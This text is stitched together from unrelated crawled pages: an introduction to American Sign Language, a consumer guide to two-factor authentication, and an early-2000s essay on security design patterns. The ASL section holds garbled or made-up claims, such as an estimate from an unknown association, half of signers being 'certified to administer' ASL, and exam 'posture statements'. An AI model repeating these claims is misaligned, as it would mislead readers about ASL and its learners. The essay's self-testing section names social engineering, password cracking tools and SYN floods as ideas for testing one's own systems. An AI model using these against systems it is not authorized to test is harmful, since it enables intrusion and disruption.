American Sign Language (ASL) is the primary non-written language of Deaf people in the U.S. and much of anglophone Canada. ASL is an expressive visual language with its own grammar, conveyed through gestures of the hands and movements of the face and body. Estimates suggest that well over a million Americans use ASL to communicate with each other and with a wide range of friends, family, and professionals. Many colleges and universities offer ASL courses and programs. They are provided primarily to individuals who wish to learn or improve their communication skills to serve their communities better and be of greater value in their personal, professional, and social lives.
There are many reasons one might want to learn ASL. Some individuals have picked up the language by watching others sign, while others have learned it from a caregiver or from a book of signs. Many people take American Sign Language classes to become certified CNAs (Certified Nursing Assistants). Others sign up for audio and video lessons of ASL expressions and gestures to memorize. Several people learn American Sign Language simply because they love the language and wish to improve their communication skills.
The National Association of Special Education Programs (NASEP) estimates that approximately 1.6 million Americans communicate in ASL. Of those individuals, about half are certified to administer American Sign Language at home or in a school/community setting. Sign language is becoming more popular throughout the United States as people learn the language or take ASL classes for personal or community benefit. There are many benefits to learning ASL:
One of the most obvious benefits of learning American Sign Language is that it is a hands-on skill that anyone can practice at any level of fluency. Compared to learning other common languages such as English and Spanish, American Sign Language has a higher retention rate because almost anyone can perform it. Individuals of all ages and from all walks of life can learn how to sign. Sign language users do not necessarily speak; instead, they use facial expressions and body motions that function as words or sentences, allowing them to hold full conversations using only hand motions and facial expressions.
In addition to ASL's visual elements, learners also benefit from producing the language themselves. Many studies show that reading books improves reading comprehension skills, with similar gains achieved by listening to audiobooks. In today's world, however, more individuals are reading text on the Internet, and many now communicate word by word via the computer. Learning American Sign Language gives individuals the ability to read and understand written languages while also allowing them to communicate on a deeper level that only face-to-face language can provide.
One of the main reasons people begin learning ASL is that they plan to take an American Sign Language exam, such as training from the American deaf exposure program. Introductory courses in ASL cover a fundamental understanding of the language, posture statements, and vocabulary exercises. The posture statement is essential in signed languages: it instructs individuals on how to position themselves physically to hold a conversation in an everyday setting. A posture statement is also helpful because it demonstrates how people who use ASL stand in relation to one another, which is vital for an American Sign Language test.
Have you noticed that many login pages have a place to enter a code or token in addition to your password? You may have thought, “Why would I need that? I already have a password for logging in.” Let me explain why adding that layer of security is a good idea.
Imagine that to use an ATM, all you needed was either a PIN or an ATM card, not both. How easy would it be for someone to withdraw money from your account? If they guessed or learned your PIN, they’d have the ATM spitting dollar bills at them. If they stole or found your ATM card, that too would grant them access to your money. Not good, right?
Fortunately, an ATM requires both your PIN (something you know) and the ATM card (something you have). Because it’s much harder to get both of them at the same time, your bank account is safer.
Now think of an online account. If it’s only protected by a password (something you know), then all it takes for someone to get access is to guess or steal your password (or guess your security questions). Unfortunately, with the growing number of data breaches, that’s not too difficult. It’s like having an ATM that only requires a PIN.
But if that online account also requires you to get a code from your phone (something you have), that would be like an ATM that also requires an ATM card. And just as that ATM would be more secure, so too your online account would be more secure.
How to Increase Your Security Using Two-Factor Authentication
Let’s go back to the website that asks for a code when you log in. That code is like your ATM card. When you log into a website, you enter your password (something you know) and the code from your phone (something you have). This is called two-factor authentication. Your password is your first factor of authentication. The code from your phone is your second factor.
So, how can you use this to make your accounts more secure?
How to Set Up Two-Factor Authentication
After you log in, look in the settings for a way to enable two-factor authentication. You may also see it called security codes, two-step verification, 2FA, or multi-factor authentication (MFA). The code may also be called a token. Look in the Security and Privacy sections of your Settings, or under Account or Profile.
Once you find the option, click through the steps to enable it. Here’s how to enable two-factor authentication on Facebook:
Many websites still offer the option of sending codes by text message (SMS). That’s unfortunate, because text messages can be intercepted and spoofed. In other words, it’s not difficult for hackers to receive your text messages, even without your phone. You can learn more about this in the Further Reading section below. For these reasons, it’s more secure to use a hardware token (I like YubiKey) or an authentication app (such as Authy, which is what I use, or Google Authenticator).
Two-factor authentication (2FA) is only as strong as your weakest 2FA method. So if an account offers multiple methods (hardware key, authentication app, SMS/text, etc.), and you choose one other than SMS/text, then do not also enable SMS/text. If a hacker can’t get past one method, they’ll try another. That means it won’t matter if you have a stronger method such as an authentication app-enabled, because the hacker will go after the weaker SMS/text.
Besides the security problem, there are other problems with text message authentication. If you don’t have phone service, you won’t receive the texts. Even if you have service, sometimes text messages take minutes to arrive, rather than seconds. Authentication apps don’t have any of these problems.
Of course, if the only way a website will let you use two-factor authentication is through texts, then use that option! It’s better than not using two-factor authentication.
Be aware that some websites won’t send codes to “virtual phone numbers,” phone numbers that use VoIP (Internet phone service). I have a Google Voice number, and some websites won’t send SMS/text messages to it. I need to use my traditional mobile phone number instead.
Most websites will allow you to create backup codes. Those are useful in case your phone is lost or stolen. Be sure to create the backup codes, and store them somewhere secure. I store mine in LastPass, in the Notes field of the website they go to.
If a website doesn’t support two-factor authentication, contact them and ask them to add the option for the sake of the security of their users.
How to Use Two-Factor Authentication
So you’ve set up two-factor authentication for your account. Nice work! You can start using it the next time you log into your account. Here’s the general process:
- You visit a website and enter your username and password.
- If this is the first time you’re accessing your account from a particular device (computer, phone, tablet), you’re asked for a second factor to confirm that you are who you say.
- You get a code from your phone, either from an authentication app, or from an SMS/text message.
- You enter the code on the webpage.
- If your code is correct, you’re logged in!
Most websites will remember your device (using cookies) so you don’t need to enter a code each time you log in, only when you log in on a new device. And you’ll be asked if you want the system to remember your device. If you’re not using one of your own devices, say no!
I highly recommend that you use two-factor authentication for any accounts that contain sensitive data. I especially recommend it for any accounts that contain financial or medical data, or other personally identifiable information. That includes any site that allows you to pay, donate, send, or receive money. But also think of how much damage someone could do by accessing other accounts, such as your email or social media accounts. It’s better to be safe than sorry!
If a website allows you to use more than two factors, consider doing that, especially if it’s an account that contains sensitive data that you want to protect.
You may wonder, “What happens if I lose my phone? Will I be unable to log into my account?” The answer is yes, unless the account allows you to enter backup codes or log in some other way (such as through security questions). That’s why it’s so important to create backup codes (see above).
- Turn On 2FA includes tutorials showing how to enable two-factor authentication on many websites (turnon2fa.com)
- Two Factor Auth List lets you look up websites and see whether they support 2FA. If they do, the site tells you how to enable 2FA, as well as which forms they support (SMS/text, phone call, email, hardware token, software token). (twofactorauth.org)
- Authy’s 2FA Guides tell how to enable 2FA on several websites (authy.com)
- Why You Shouldn’t Use SMS for Two-Factor Authentication (and What to Use Instead) (howtogeek.com)
- Why you are at risk if you use SMS for two-step verification (cnet.com)
- Hanging Up on Mobile in the Name of Security (krebsonsecurity.com)
- Is two-factor authentication (2FA) as secure as it seems? (malwarebytes.com)
- How to: Enable Two-factor Authentication (eff.org)
What You Should Do
- Enable two-factor authentication for any account that contains sensitive data, or that you wouldn’t want to be hacked.
- Whenever possible, use a hardware token (such as YubiKey) or an authentication app (such as Authy or Google Authenticator) rather than receiving codes by text message or email.
- Create backup codes in case you’re ever without your phone when you need to log in. Save them securely, such as in your password manager or on paper in a safe.
Keeper is a top-rated password manager for protecting you, your family, and your business from password-related data breaches and cybersecurity threats.
1Password remembers all your passwords, so you can easily log in to sites with a single click.
Dashlane fills all your passwords, payments, and personal details wherever you need them, across the web, on any device. | <urn:uuid:00b01826-8cc1-42ce-86d7-5912fbe498dc> | CC-MAIN-2022-40 | https://defendingdigital.com/how-why-to-use-two-factor-authentication/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00688.warc.gz | en | 0.91866 | 1,871 | 3.171875 | 3 |
Security Design Patterns
Part 1 v1.4
Copyright 2001, Sasha
A comprehensive security strategy first requires a high level recognition of overall Security Principles. They are simple statements, generally prepared by a Chief Information Officer (or Chief Security Officer), that address general security concerns. E.g. monitor all activity, audit your practices, promote security awareness, etc.
Next, Security Policies are created. These are the realization of Security Principles. Prepared by security professionals, Security Policies are meant to address security issues when implementing business requirements. E.g. use out of band communication when responding to an incident alert, employ secure coding techniques, implement a central log server, etc.
Finally, Security Procedures are identified. This is an itemized, quantifiable list that identifies specific hardware, tools and tasks. E.g. disable telnet and ftp on all hosts – replace with ssh and scp, validate html form data on both client and server, change default application passwords, etc.
This essay is not meant to replace any of these documents, but to supplement all three. That is, once general policies are defined, security patterns can assist in identifying and formulating all security practices that are relevant to your environment.
These patterns are essentially security best practices presented in a template format. This format, we feel, will assist the reader in identifying and understanding existing patterns, and enable the rapid development and documentation of new best practices.
Design patterns were first introduced as a way of identifying and presenting solutions to reoccurring problems in object oriented programming. Joseph Yoder and Jeffrey Barcalow were among the first to adapt this approach to information security. Here, we attempt to build upon this list by introducing eight patterns. The format was adopted from the object oriented design pattern template developed by the Gang of Four (see Appendix A). Of course, no experience with OO programming is required to enjoy these patterns.
The Yoder and Barcalow paper presented the following patterns:
· Single Access Point: Providing a security module and a way to log into the system.
· Check Point: Organizing security checks and their repercussions.
· Roles: Organizing users with similar security privileges.
· Session: Localizing global information in a multi-user environment.
· Full View with Errors: Provide a full view to users, showing exceptions when needed.
· Limited View: Allowing users to only see what they have access to.
· Secure Access Layer: Integrating application security with low-level security.
These are a good start, but when we consider the issues that arise when securing a networked application there are others that will apply.
In this essay we present the following security patterns:
· Authoritative Source of Data: Recognizing the correct source of data.
· Layered Security: Configuring multiple security checkpoints.
· Risk Assessment and Management: Understanding the relative value of information and protecting it accordingly.
· 3rd Party Communication: Understanding the risks of third party relationships.
· The Security Provider: Leveraging the power of a common security service across multiple applications.
· White Hats, Hack Thyself: Testing your own security by trying to defeat it.
· Fail Securely: Designing systems to fail in a secure manner.
· Low Hanging Fruit: Taking care of the “quick wins”.
The patterns described in this essay (along with the ones already published) represent a collection of security best practices. Naturally, depending on one’s environment and goal, some may apply and others may not.
The intent is for the reader to review all patterns and identify those that are relevant to their environment; the implementation of which may define or refine an existing security policy.
Note that the scope of these patterns should not be restricted to software applications alone. For example, Check Point, Single Access Point and Layered Security all apply to network security just as well.
Let’s assume you have an existing ebusiness site. You have gone through initial due diligence to secure the application, servers, and network. What else can be done and where do you start?
Let’s review the patterns you may already have used:
Session: You know basically who your users are and what they’re accessing. You may have targeted web content and individual login accounts for specialized information.
Layered Security: Your ISP has (assured you they’ve) protected your network with ACLs on their (shared) switch or firewall. Your servers are patched as of two months ago and run minimal services. Your 3rd party applications don’t use their default passwords and don’t run as root.
Risk Assessment and Management: Your clickstream and web logs aren’t encrypted, but customer credit card information exists encrypted in the database. Sensitive corporate information sits on a file server on a separate subnet, behind a firewall.
3rd Party Communication: On a scheduled basis, you exchange information with a business partner. The files are sent cleartext over ftp.
Not bad, but what else can be done? Let’s go through the patterns…
Authoritative Source of Data:
· Are the applications processing the proper data? That is, are they using values from a trusted database or do they originate from a potentially fraudulent source?
· Is the trusted source still valid? Has there been a migration of data or data ownership?
· How does the firewall restrict access to the corporate firewall? Have these ACLs been revisited lately?
· How are vpn, home DSL users secured?
· Has there been a network or application breach of security? Would you really know if there was? How?
Risk Assessment and Management:
· Can you locate all of the sensitive corporate documents? Can you locate those responsible for them – the data owners? Are the documents stored and transferred securely?
· Have you recently performed a vulnerability and risk assessment of your network and applications? Have you addressed the results?
3rd Party Communication:
· Other than cleartext ftp, how is access controlled? Are the passwords ever changed? Is the data sanitized before being processed?
· Are you are actively monitoring your network and have learned to detect anomalous behavior like burst traffic, forged packets or unused protocols?
· Are your business partners adequately segregated from one another? Are you sufficiently protected from them? Could one business partner potentially use your network to attack another partner? How do you know?
The Security Provider:
· Do you provide access via web, ftp or other applications to business partners? If so, is the access control managed centrally? Does the current method scale? Does it need to?
· Do your business applications provide adequate authentication and authorization? Would you benefit from having these services abstracted out to a single system? Could it then be leveraged by other applications and managed centrally?
· Is there a sufficient level of delegated admin?
White Hats, Hack Thyself:
· Are you aware of all known vulnerabilities in you environment?
· How seriously does management take security? Would this change if you sent them their password, or those of your customers?
· How does management view the risk of attack (in financial terms)? Have they tried to quantify the risk?
· Are you prepared (or even able) to take the appropriate legal action in the event of an incident?
Given that there are many more patterns to be discussed, this essay presents only a limited number. The following are additional patterns to be discussed in a follow-up paper.
· Distributed Trust: Distributing trust amongst multiple entities.
· Least Privileges: Granting the minimum access necessary to perform any given task, for a minimum amount of time.
· Role Based Access Control (RBAC): Abstraction of users from the resources they’re attempting to access.
· Data Privacy, Integrity, Authentication: Protecting data from eavesdroppers, theft and manipulation.
· Data Sanitization: Removal of expired, duplicate and unnecessary data, finding owners, normalizing at times, legalization almost always (i.e. no shared versions of licensed code).
· Feel the Network: Learning to recognize load and activity patterns in your environment. Establishing a datum for the purpose of identifying anomalies.
System of Record
Patient health records are nowadays becoming accessible over public networks. Granted, every packet may be strongly encrypted, with guaranteed privacy, authentication and integrity. The networked applications may be built securely and provide high availability, but this is of little comfort if the highly protected information itself is outdated or incorrect. Understanding the authoritative source of data means recognizing where your data is coming from and knowing to what extent you can trust the validity of such information.
If an application or user blindly accepts data from any source then it is at risk of processing potentially outdated or fraudulent data. Therefore, an application needs to recognize which, of possibly many sources, is the single authority for data.
Are you assured the data you’re using is the cleanest and most accurate? In other words, is the data coming from a legitimate source or from an unknown party?
· Enterprises with multiple business units fail to recognize which, of many possible data stores, is the proper authority for information. E.g. a local database, corporate HR, managed outsourced provider, etc.
· Web applications store confidential information inside http cookies without properly protecting the contents from theft, modification or impersonation.
· A news wire receives a report of the resignation of several board members of a company. Several employees are also allegedly involved in an internal computer attack. The news wire mistakenly publishes the counterfeit report, causing the company’s value to plummet.
· Web applications process (hidden) form values without verifying their integrity.
Never make assumptions about the validity of unverified data or its origin.
Business applications are designed to accept, process and (optionally) return information. They may accept data from end users, static repositories or other applications; in real- time, delayed, or by batch processing. Regardless of the origin, type, or purpose, there should be meaningful validation at each step.
In most cases, determining the authoritative source of data will lie with the owner of the business process. They, rather than information security or IT groups, will understand the purpose of data in a larger context. Information security and IT, however, should still advise the business owner on the volatility and integrity of the data source(s) under consideration.
· Some application servers recognize when an html form value has been changed. They hash the names and values of hidden form fields before they are served to the client and compare the hash when the form is posted back.
· Etailer applications retrieve pricing, discounts from the application’s database and never rely on hidden values passed along in form submissions.
· Enterprise applications need to agree on a primary source for employee information and ensure duplicate or expired data has been purged.
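The hidden-field hashing mentioned in the examples above can be sketched in a few lines of Python: the server signs hidden form names and values with an HMAC before serving the page, and verifies the signature on post-back. The key and field names here are hypothetical; a real deployment would keep the key in protected server-side configuration.

```python
import hashlib
import hmac

SECRET_KEY = b"server-side-secret"  # hypothetical; kept on the server, never sent to clients

def sign_fields(fields):
    """Compute an HMAC over hidden form names and values before serving the page."""
    canonical = "&".join(f"{k}={v}" for k, v in sorted(fields.items()))
    return hmac.new(SECRET_KEY, canonical.encode(), hashlib.sha256).hexdigest()

def verify_fields(fields, signature):
    """On post-back, recompute the HMAC and compare in constant time."""
    return hmac.compare_digest(sign_fields(fields), signature)

served = {"item_id": "42", "price": "19.99"}
sig = sign_fields(served)
assert verify_fields(served, sig)                                  # untouched form passes
assert not verify_fields({"item_id": "42", "price": "0.01"}, sig)  # tampered price fails
```

Any client-side change to a signed value invalidates the signature, so the application can refuse to process data that did not originate from its own trusted source.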
✓ Integrity of data is maintained
✓ The risk of processing and propagating fraudulent (poisoned) data is reduced.
✗ Increased time to implement new processes as multiple data sources may be consolidated into one.
Defense in Depth
Belt and Suspenders
Networked applications are susceptible to many forms of attack that may target the network, host or application layer and the communication between them. Naturally, the overall security of a system is greatly improved when each one of these layers is identified, protected, and audited for possible weakness.
Moreover, attacks may originate internally or externally. Basing security rules on the premise of "internal users are good" and "external users are bad" is fundamentally flawed (read: insider threat) and difficult to manage. With increased use of external business communication channels, it becomes much more difficult to identify which users or sessions are "internal" and which are "external".
Networked applications and the environment within which they operate are vulnerable at many layers and from all directions. Each device, data object, session, file and process is a potential target and needs to be identified and secured.
· Once standalone applications are suddenly now networked and unprepared to withstand network attacks.
· Protection of any one of network, server or application is not sufficient to adequately protect the data within an enterprise.
· While one or many components of a system may be protected, the system is only as secure as its weakest link.
· If a single device or application fails or is misconfigured, it could potentially expose all private resources.
Employ security measures at all layers of a networked application and throughout its operating environment.
Router ACLs, address translation and intrusion detection systems protect the network layer. OS hardening, thoughtful application installation and configuration protect the host and the applications that run on it. Practicing secure coding techniques protect all of the above. Finally, proper baselining and monitoring methodologies protect all these layers on an ongoing basis.
Don’t ignore insider threat. Intrusions and attacks can originate from the inside just as they can from the outside. Authentication, authorization, antivirus software, and intrusion detection systems should protect resources from both sides of the corporate boundary.
· Firewalls provide ingress/egress packet and protocol filtering.
· Application servers and 3rd party services authenticate users over SSL.
· Applications validate form data by length, bounds and type.
· All network and application activity is monitored and logged for analysis.
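The application-layer validation in the examples above (by length, bounds, and type) can be sketched in a few lines of Python. The field semantics and limits are hypothetical; the point is that the server enforces them regardless of any client-side checks.

```python
def validate_quantity(raw):
    """Validate a form field on the server by length, type, and bounds.
    Client-side checks are a convenience, not a security control."""
    if len(raw) > 6:                     # length: reject oversized input early
        raise ValueError("input too long")
    if not raw.isdigit():                # type: digits only
        raise ValueError("not a number")
    value = int(raw)
    if not 1 <= value <= 1000:           # bounds: business-rule limits (hypothetical)
        raise ValueError("out of range")
    return value

assert validate_quantity("42") == 42
for bad in ["", "-5", "9999999", "12; DROP TABLE orders"]:
    try:
        validate_quantity(bad)
        raise AssertionError("should have been rejected")
    except ValueError:
        pass  # each malformed input is refused at this layer
```

Even if the firewall and SSL layers above it are defeated, this check still stands between an attacker and the database, which is the essence of layered security.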
✓ Greatly improved overall security
✓ Reduced exposure to attack if one security measure should be subverted or misconfigured
✓ Continuously validates security efforts
✗ More complex security architecture
Risk Assessment and Management
Not all information requires the same degree of protection. Patient records, web log files, military tactics, and hourly weather reports all have varying degrees of sensitivity. The proper security of all of this information requires risk analysis. Naturally, if the risk is high, the effort to protect the data should be great. If the risk is low, the protection should be low.
Similarly, hardware and software throughout the enterprise will require varying degrees of hardening. The security requirements of a front-end application server are different than those of an internal development machine. A front-line firewall is secured differently than a QA router.
It is worth noting that this could be considered a catch-all pattern. Since security is all about risk management, every resource (file, servlet, object, datastore, application, server, etc.) warrants risk assessment.
Whenever information needs to be transferred, stored or manipulated, the privacy and integrity of that data needs to be reasonably assured. Hardware and software require protection from misconfiguration, neglect and attack. Underprotection of any of these could drive a company to bankruptcy (or legal battle) and overprotection is a waste of resources.
· Time and money improperly allocated to protecting resources.
· Risk incorrectly assessed, or not assessed at all.
Identifying and assessing risk is the first step to better security. Risk is proportional to the following three variables: threat, vulnerability and cost(value). That is,
Risk = Threat × Vulnerability × Cost (Eq. 1), where:
Threat is the frequency of attempts or successes,
Vulnerability is the likelihood of success, and
Cost is the total cost of a successful breach by this mechanism. Cost also accounts for the value of the resource or information being protected.
Eq. 1 also implies that if any one of these variables is zero, the risk will also be zero. Identifying a practical example of this is left as an exercise to the reader.
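Eq. 1 lends itself to a simple ranking exercise. The Python sketch below scores a handful of assets so that protection effort can follow relative risk; the threat, vulnerability, and cost figures are invented purely for illustration.

```python
def risk(threat, vulnerability, cost):
    # Eq. 1: Risk = Threat * Vulnerability * Cost
    return threat * vulnerability * cost

# (name, threat 0-1, vulnerability 0-1, cost in dollars) -- illustrative figures only
assets = [
    ("customer credit cards", 0.8, 0.2, 500_000),
    ("press releases",        0.3, 0.5, 5_000),
    ("hourly weather feed",   0.1, 0.9, 100),
]

# Rank assets so the most protection goes to the highest relative risk.
for name, t, v, c in sorted(assets, key=lambda a: risk(*a[1:]), reverse=True):
    print(f"{name}: risk = {risk(t, v, c):,.2f}")
```

Note how the weather feed scores near zero despite its high vulnerability: with a negligible cost term, Eq. 1 says it warrants little protection effort.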
Learn to recognize what is valuable and to whom. Different attackers will have different motives and will therefore target different resources. Youth hackers, generally, are motivated by publicity or mischief and seek to deface web pages or spread malware. Professional criminals are motivated by financial reward and may seek to steal credit card numbers or specialized information (secret recipes, blueprints, etc.). Terrorists care little for web page defacement but more for infrastructure denial of service and mass destruction.
· Production web and application servers are severely hardened, kept up to date with patches and actively monitored.
· QA and development machines have a reduced (from default) set of services running but may be behind on patch updates.
· Customer credit cards are strongly protected and stored encrypted (or not stored at all).
· Hourly weather feeds are not stored or transferred securely.
· Press releases, while hopefully authenticated, need not be encrypted.
✓ Only the appropriate amount of effort is spent to protect data
✓ A better understanding is gained of the profiles of attackers and the value of data they seek.
✓ Recognition of ownership and accountability of data within the organization
Virtual Enterprise Network
Enterprises often partner with third parties to support their business model. These may include application and managed service providers, business partners, vendors, and even satellite offices. As part of this relationship, access must be granted to allow potentially sensitive data to travel between the organizations. Without attention to the security of that data and the methods of transfer, one or both organizations may be at risk. Not only is there risk of data theft and manipulation, but also the risk of allowing other organizations to access your resources.
You may trust the partner with whom you entered into a relationship, but you may not trust their contractors, application vendors, networks or firewall configuration. A breach in their network may lead to a breach in yours; for example, the May 30, 2001 OSDN break-in that allowed an attacker to jump from SourceForge to a server of the Apache Software Foundation.
Two companies in a business relationship may trust each other, but to what degree? Specifically, when two businesses exchange information, users and/or applications will require access to privileged resources. How can access be granted while at the same time protecting both organizations? Additionally, how can this be managed in such a way that is neither overly complex nor dangerously simplistic?
· Companies need to be assured that private information is adequately protected when traveling over a public or private network.
· Applications that communicate with business partners become vulnerable not only to attack from that partner but also from attacks from users who defeat the partners’ security.
· Accountability is difficult to assure without a proper security policy signed by all parties involved.
· Security procedures become difficult to manage when both business partners do not share the same security requirements and considerations.
Begin by identifying appropriate channels of communication and information exchange. This includes all protocols and any hardware devices that will be used, e.g. an IPsec VPN, HTTPS, SSH, or FTP. Next, define the authorized access points. For IP connectivity, this implies defining where connections will be originating and where they are destined. This helps restrict access based on source and destination host. Next, identify all users that require privileged access. Assign usernames and passwords via out-of-band communication.
Additional security will be achieved if all 3rd party traffic can be separated from one another. Switched networks, separate subnets and individual hosts are examples of reasonable practices.
Provide technical and emergency points of contacts and define any fall back procedures. This information becomes critical in the event of system failure and steadfast business deadlines.
Once the risks have been identified and security measures defined, both parties should signoff on these policies. They must commit but be flexible to modify them should the risk or business requirements change.
Both parties should be willing to provide audit and compliancy reports proving adherence to the policy. Under some circumstance, a personnel security audit may be required.
Finally, once a business relationship has terminated, swiftly revoke all access by the partner to your network and applications.
· Web based extranet access will be available only over SSL. Username and password will be provided via OOB communication or encrypted email.
· Adequate password hygiene will be maintained.
· Users will not share accounts nor escalate their privileges by using another person’s account. SUDO will be provided where necessary.
· File transfer will take place on a scheduled basis via ftp. Chroot environments will be configured and files will be pgp encrypted and stored in a write only directory.
· Activity logs will be distributed on an appropriately scheduled basis. Each party is requested to confirm all activity.
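The sanitization implied by this pattern, validating a partner's file before processing it, might look like the following Python sketch. The CSV schema, field names, and bounds are hypothetical; the point is to enforce the agreed format rather than trust the partner's systems.

```python
import csv
import io

EXPECTED_COLUMNS = ["order_id", "sku", "quantity"]  # hypothetical agreed feed schema

def sanitize_feed(text):
    """Validate a partner's CSV feed before processing: enforce the agreed
    schema and reject malformed rows instead of propagating them."""
    reader = csv.DictReader(io.StringIO(text))
    if reader.fieldnames != EXPECTED_COLUMNS:
        raise ValueError("unexpected schema from partner")
    clean = []
    for row in reader:
        if not (row["order_id"].isdigit() and row["quantity"].isdigit()):
            continue                      # drop rows with non-numeric identifiers
        if not 1 <= int(row["quantity"]) <= 10_000:
            continue                      # drop rows outside agreed bounds
        clean.append(row)
    return clean

feed = "order_id,sku,quantity\n1001,ABC,5\nbogus,DEF,3\n1002,GHI,999999\n"
assert [r["order_id"] for r in sanitize_feed(feed)] == ["1001"]
```

A rejected-row count from this step also feeds naturally into the activity logs that each party is asked to confirm.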
✗ Additional security configurations and policies to manage
✓ Properly managed expectations with respect to security precautions and procedures
✓ Auditable activity for both parties
✓ Secured third party communications enables new business partnerships and alliances
Risk Assessment and Management
Single Sign On
An enterprise application may be comprised of a number of software and hardware components with each potentially performing its own authentication, authorization, or encryption. While some of these components may implement open or standards-based APIs, others may use closed or unknown technology or simply lack functionality altogether. By abstracting security services from individual applications, an organization is able to centralize the management and functionality of the protocols and policies governing authentication and authorization services.
When disparate applications seek to provide their own security services, privacy, synchronization and management of data become unnecessarily complex. Moreover, applications may not provide the security features or strength required, risking the overall integrity of the data. These applications may be communicating securely or they may be using weak or inappropriately vulnerable methods. Without a common security infrastructure, management becomes unnecessarily difficult and the security of the entire environment is put at risk.
· Desire to use a single service to provide management and auditing for a common set of security services for all enterprise applications.
· Desire to use stronger, or more flexible security features in applications.
· Desire to provide integrity and consistency of data for authentication and authorization.
A Security Provider is a central service to which all authentication and authorization requests are directed. Applications such as email, web, corporate applications and others, would communicate directly with the Security Provider. The Security Provider then communicates with a user or policy store to evaluate a user's credentials and privileges.
A Security Provider has the following properties:
· Authoritative source for user verification (authentication)
· Authoritative source for role assignment and policy enforcement (authorization)
· Provides centralized (and possibly delegated) management of security policies
· Provides consolidated reporting and auditing facilities
· Implements secured connections to possibly separate user and policy data stores
· Defines appropriate type and strength of technology for information protection (encryption) between itself and requesting applications
· May provide single sign on (SSO) facilities across applications
· May provide single sign on facilities across organizations or satellite offices
· BEA’s WebLogic Server can abstract authentication requests to an external user store, affording integration with a Security Provider.
· Entrust and other vendors provide single sign on applications that centralize user credentials and authorization policies.
· Netegrity’s Siteminder can effectively create a single sign on across multiple disparate applications by brokering trust back to the user’s “home” authentication service.
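The broker arrangement described in the Solution can be sketched in a few lines. Everything here (the class name, the in-memory user and policy stores, the SHA-256 hashing) is an illustrative assumption, not a feature of any product named above:

```python
# Minimal sketch of a central Security Provider (illustrative only).
# A real deployment would back this with an external user store such as
# LDAP and communicate over secured, encrypted connections.
import hashlib

class SecurityProvider:
    """Single authority for authentication and authorization requests."""

    def __init__(self):
        self._users = {}     # username -> password hash (stand-in user store)
        self._roles = {}     # username -> set of granted roles (policy store)
        self.audit_log = []  # consolidated reporting/auditing facility

    def add_user(self, username, password, roles=()):
        self._users[username] = hashlib.sha256(password.encode()).hexdigest()
        self._roles[username] = set(roles)

    def authenticate(self, username, password):
        digest = hashlib.sha256(password.encode()).hexdigest()
        ok = self._users.get(username) == digest
        self.audit_log.append(("authn", username, ok))
        return ok

    def authorize(self, username, role):
        ok = role in self._roles.get(username, set())
        self.audit_log.append(("authz", username, role, ok))
        return ok

# Every application (mail, web, corporate apps) calls the same provider,
# so policy changes and audit trails live in one place.
provider = SecurityProvider()
provider.add_user("alice", "s3cret", roles={"payroll"})
print(provider.authenticate("alice", "s3cret"))  # True
print(provider.authorize("alice", "payroll"))    # True
print(provider.authorize("alice", "admin"))      # False
```

Because every request passes through one service, the consolidated `audit_log` doubles as the centralized reporting facility listed in the properties above.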
✓ Efficient user and data management due to centralized user store
✓ Common set of technologies and standards used for all security services
✓ Transparent session for end users across applications and potentially across participating organizations
✗ Applications need to be configured (or reconfigured) to utilize this common authentication service.
Authoritative Source of Data
Policies and information security documentation will ultimately fail unless they are understood, practiced, and revised. Once an organization has developed reasonable security measures, the implementation must be verified. Testing security by applying gray hat techniques against your own systems can be quite revealing. The goal is not to crash systems, but to test the behavior and response of your network, application and staff.
How can you be assured of the true security of your systems without real-world testing?
· After-the-fact discovery of misconfigured security tools or measures.
· Response personnel ill prepared for incident handling.
· Uncertainty of how devices will respond to targeted attacks.
Under a controlled, but non-trivial circumstance, plan and execute an attack. You have the option of targeting various parts of your environment:
· Social Engineering (aka Semantic Attack): Attempt to acquire passwords or privileged information from employees by impersonating a manager, office administrator, or operations staff.
· Server: Test backups by randomly deleting (or “misplacing”) a file or directory. Use Crack, John the Ripper or L0phtCrack to determine weak user or application passwords.
· Network, Personnel: Perform a TCP SYN flood against a web, mail, or LDAP server. Note this does not need to be an externally facing server; an “internally” facing attack may, indeed, be more educational.
· Application Code: Attempt some of the popular application exploits; buffer overflow, misconfigurations, cookie poisoning, parameter tampering, replay attack. Check for meaningful log messages and abnormal application behavior.
· Passive attacks: Sniffing the wire for cleartext passwords or other confidential information. Perform a TCP and UDP port scan.
· Active attack: Penetration or reconnaissance attack from the outside in.
· Save the viruses, trojans, worms and other malware for isolated testing environments. Be certain to cleanly wipe the infected machines afterwards.
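One of the checks above, auditing for weak passwords, reduces to an offline dictionary test. The sketch below uses unsalted SHA-256 purely for brevity; real audit tools such as John the Ripper handle salted Unix crypt formats and far larger wordlists:

```python
# Toy offline password audit: flag accounts whose stored hash matches a
# dictionary word. Unsalted SHA-256 is an illustrative simplification.
import hashlib

def audit_weak_passwords(hashes_by_user, wordlist):
    """Return {username: cracked_password} for any dictionary hits."""
    lookup = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes_by_user.items() if h in lookup}

accounts = {
    "bob": hashlib.sha256(b"password123").hexdigest(),     # weak choice
    "eve": hashlib.sha256(b"T@x1-F4ir-Moon").hexdigest(),  # not in wordlist
}
weak = audit_weak_passwords(accounts, ["letmein", "password123", "qwerty"])
print(weak)  # {'bob': 'password123'}
```

Recording which accounts fall to a trivial wordlist gives the measurable audit trail discussed below.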
Perform the attacks on an ongoing basis and be sure to record the results. This will be valuable when determining the effectiveness of the tests and the organization’s overall security.
To protect the integrity of the tests, ensure they are performed with limited staff knowledge; you don’t want to spoil the surprise. It is also wise to wait for an appropriate time when there is available staff and there are no corporate emergencies.
Be very careful with these tests; you do not want to permanently damage any system, application or reputation. And of course, this should only be performed against your own environment and not against your customer or business partner.
· Sanctum’s AppScan has the ability to automate and document controlled web-based intrusion attempts.
· nCircle actively monitors networks and hosts for new activity and vulnerabilities and responds accordingly.
✓ Opportunity to bring controlled security testing into the QA cycle.
✓ Repeatedly testing security measures provides a measurable audit trail of improvement.
✓ Using attacker tools educates security professionals on methods of attack and defense.
✓ Social engineering attacks raise security awareness for all employees.
✓ Helps quantify cost of attempted and successful intrusions to upper management.
✗ Risk of actual damage.
Risk Assessment and Management
Networks, hosts and applications should default to secure operation. That is, in the event of failure or misconfiguration they should not reveal more information than necessary with regard to
· error messages (for efficient debugging purposes)
· the application configuration (directory, version/patch levels)
· the operating environment (network addressing, OS version/patch levels)
As well, they should not allow transactions or processes to continue
· with more privileges than normal
· with more access than normal
· without proper validation of input parameters and output results
· bypassing any monitoring or logging facilities
